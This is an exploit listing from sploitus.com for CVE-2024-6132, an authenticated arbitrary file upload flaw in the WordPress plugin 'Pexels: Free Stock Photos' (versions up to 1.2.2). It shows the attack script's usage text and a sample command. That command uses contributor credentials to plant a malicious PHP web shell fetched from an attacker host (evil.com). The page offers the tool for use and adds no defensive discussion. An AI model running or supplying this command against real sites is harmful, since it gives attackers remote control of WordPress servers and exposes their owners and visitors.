Share
## https://sploitus.com/exploit?id=DAA1B055-C63E-52C5-BC0A-EFDED5EE816E
# CVE-2024-6132
Pexels: Free Stock Photos <= 1.2.2 - Authenticated (Contributor+) Arbitrary File Upload
## Usage
```
usage: CVE-2024-6132.py [-h] -u URL -un USERNAME -p PASSWORD -shell_url SHELL_URL
Pexels: Free Stock Photos <= 1.2.2 - Authenticated (Contributor+) Arbitrary File Upload | BY NXPLOIT - KHALED ALENAZI,
options:
-h, --help show this help message and exit
-u URL, --url URL WordPress site URL
-un USERNAME, --username USERNAME
WordPress username
-p PASSWORD, --password PASSWORD
WordPress password
-shell_url SHELL_URL, --shell_url SHELL_URL
URL of the malicious PHP file
```
## Example:
```
python3 CVE-2024-6132.py -u https://targetsite.com -un contributor -p password123 -shell_url http://evil.com/shell.php